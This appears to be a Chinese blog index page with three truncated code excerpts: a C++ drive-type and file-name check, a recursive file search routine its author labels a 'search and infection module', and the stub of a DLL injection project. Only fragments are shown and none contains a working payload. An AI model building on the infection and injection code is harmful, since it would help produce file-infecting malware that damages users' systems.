摘要: //测试 含有空格的文件名, 检测, 文件名内是否有空格。//另外就是使用 SEH异常处理#include #include #include using namespace std;int RetDriveTypeStr(char* szTypeStr, int nType){ char szNoType[] = "未知类型"; char szLogical[] = "硬盘驱动器"; char ...
阅读全文
摘要: // 对 选择进入子目录后 增加了一句 SetCurrentDirectory , 这样才不致于 重复枚举文件。 //搜索和感染模块//内部检索所有文件, 在内部再判断扩展名bool __stdcall SearchEntry(HWND param_ListBoxHWND, const char* param_curDir, const char* param_extendName, ...
阅读全文
摘要: // InjectDLL.cpp : Defines the entry point for the DLL application.//#include "stdafx.h"#include "InjectDLL.h"// This is an example of an exported variableINJECTDLL_API int nInjectDLL=0;// This is an ...
阅读全文